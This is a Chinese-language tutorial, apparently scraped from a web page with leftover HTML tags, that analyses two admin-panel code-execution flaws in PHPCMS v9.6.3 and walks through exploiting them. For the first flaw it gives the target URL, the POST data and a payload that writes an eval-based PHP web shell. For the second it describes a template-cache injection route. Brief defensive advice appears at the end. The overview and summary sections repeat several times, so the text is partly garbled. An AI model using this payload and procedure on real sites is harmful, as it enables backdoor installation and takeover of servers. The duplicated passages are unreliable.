PHPCMS v9.6.3 后台漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
PHPCMS v9.6.3 后台存在多处安全漏洞，攻击者可以利用这些漏洞实现任意代码执行（GETSHELL）。本文档将详细分析两处关键漏洞的利用方法。<\/p>

漏洞一：模板解析导致的代码执行<\/h2>

漏洞位置<\/h3>
`block_admin<\/code> 模块中的模板解析功能<\/p>`

漏洞分析<\/h3>

漏洞触发点位于模板解析过程中，系统直接包含用户可控的模板文件：<\/li>
<\/ol>
if<\/span> (@<\/span>file_put_contents<\/span>($filepath,$str)) {
<\/span><\/span>    ob_start<\/span>();
<\/span><\/span>    include<\/span> $filepath;
<\/span><\/span>    $html =<\/span> ob_get_contents<\/span>();
<\/span><\/span>    ob_clean<\/span>();
<\/span><\/span>    @<\/span>unlink<\/span>($filepath);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
模板内容来源：<\/li>
<\/ol>
$str =<\/span> $tpl-><\/span>template_parse<\/span>(new_stripslashes<\/span>($template));
<\/span><\/span>$template =<\/span> isset<\/span>($_POST['template'<\/span>]) &&<\/span> trim<\/span>($_POST['template'<\/span>]) ?<\/span> trim<\/span>($_POST['template'<\/span>])
<\/span><\/span><\/code><\/pre>用户通过POST提交的template<\/code>参数未经任何过滤直接用于模板解析。<\/p>
利用步骤<\/h3>

访问以下URL（需要有效的pc_hash参数）：<\/li>
<\/ol>
http:\/\/www.test.com\/phpcms\/install_package\/index.php?m=block&c=block_admin&pc_hash=B8mgrw&a=add&pos=1
<\/code><\/pre>

提交POST数据：<\/li>
<\/ol>
dosubmit=1&name=ac&type=2
<\/code><\/pre>

在template<\/code>参数中插入恶意PHP代码：<\/li>
<\/ol>
<?<\/span>php<\/span> file_put_contents<\/span>("phpcms_shell.php"<\/span>,"<?php eval(<\/span>\$<\/span>_POST[1]);?>"<\/span>);?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
成功执行后会在网站根目录生成phpcms_shell.php<\/code>后门文件。<\/li>
<\/ol>
漏洞二：缓存编译导致的代码执行<\/h2>
漏洞位置<\/h3>
category<\/code> 模块中的模板缓存编译功能<\/p>
漏洞分析<\/h3>

setting<\/code>参数直接存入数据库，未经任何过滤：<\/li>
<\/ol>
$setting =<\/span> $_POST['setting'<\/span>];
<\/span><\/span>$_POST['info'<\/span>]['setting'<\/span>] =<\/span> array2string<\/span>($setting);
<\/span><\/span><\/code><\/pre>
系统会从数据库读取setting[page_template]<\/code>字段值用于模板编译：<\/li>
<\/ol>
include<\/span> template<\/span>('content'<\/span>,$template);
<\/span><\/span><\/code><\/pre>
模板编译过程：<\/li>
<\/ol>
$compiledtplfile =<\/span> PHPCMS_PATH<\/span>.<\/span>'caches'<\/span>.<\/span>DIRECTORY_SEPARATOR<\/span>.<\/span>'caches_template'<\/span>.<\/span>DIRECTORY_SEPARATOR<\/span>.<\/span>$style.<\/span>DIRECTORY_SEPARATOR<\/span>.<\/span>$module.<\/span>DIRECTORY_SEPARATOR<\/span>.<\/span>$template.<\/span>'.php'<\/span>;
<\/span><\/span>$content =<\/span> $this-><\/span>template_parse<\/span>($content);
<\/span><\/span>$strlen =<\/span> file_put_contents<\/span> ( $compiledtplfile, $content );
<\/span><\/span><\/code><\/pre>
最终通过include<\/code>包含编译后的PHP文件实现代码执行。<\/li>
<\/ol>
利用步骤<\/h3>


找到可控的HTML模板文件（如栏目模板）。<\/p>
<\/li>

通过栏目管理功能提交恶意setting<\/code>参数，包含page_template<\/code>指向恶意模板。<\/p>
<\/li>

访问以下URL触发模板编译（catid<\/code>需替换为实际栏目ID）：<\/p>
<\/li>
<\/ol>
http:\/\/www.test.com\/phpcms_v9.6.3_UTF8\/install_package\/index.php?m=content&c=index&a=lists&catid=15
<\/code><\/pre>

系统会编译恶意模板并执行其中的PHP代码。<\/li>
<\/ol>
防御建议<\/h2>


对所有用户输入进行严格过滤，特别是文件路径和模板内容。<\/p>
<\/li>

限制模板文件只能位于特定目录，禁止使用相对路径跳转。<\/p>
<\/li>

对模板解析过程进行安全审计，避免直接执行用户可控代码。<\/p>
<\/li>

及时更新到最新版本，官方可能已修复这些漏洞。<\/p>
<\/li>
<\/ol>
总结<\/h2>
这两处漏洞都源于对用户输入的不当信任，通过精心构造的输入，攻击者可以绕过安全限制实现任意代码执行。开发人员应始终遵循"不信任任何用户输入"的原则，对所有输入进行严格验证和过滤。<\/p>

PHPCMS v9.6.3 后台漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2> PHPCMS v9.6.3 后台存在多处安全漏洞，攻击者可以利用这些漏洞实现任意代码执行（GETSHELL）。本文档将详细分析两处关键漏洞的利用方法。<\/p>

漏洞一：模板解析导致的代码执行<\/h2>

漏洞位置<\/h3> block_admin<\/code> 模块中的模板解析功能<\/p>

漏洞二：缓存编译导致的代码执行<\/h2>

漏洞位置<\/h3> category<\/code> 模块中的模板缓存编译功能<\/p>

总结<\/h2> 这两处漏洞都源于对用户输入的不当信任，通过精心构造的输入，攻击者可以绕过安全限制实现任意代码执行。开发人员应始终遵循"不信任任何用户输入"的原则，对所有输入进行严格验证和过滤。<\/p>

漏洞概述<\/h2>
PHPCMS v9.6.3 后台存在多处安全漏洞，攻击者可以利用这些漏洞实现任意代码执行（GETSHELL）。本文档将详细分析两处关键漏洞的利用方法。<\/p>

漏洞位置<\/h3>
`block_admin<\/code> 模块中的模板解析功能<\/p>`

漏洞位置<\/h3>
`category<\/code> 模块中的模板缓存编译功能<\/p>`

总结<\/h2>
这两处漏洞都源于对用户输入的不当信任，通过精心构造的输入，攻击者可以绕过安全限制实现任意代码执行。开发人员应始终遵循"不信任任何用户输入"的原则，对所有输入进行严格验证和过滤。<\/p>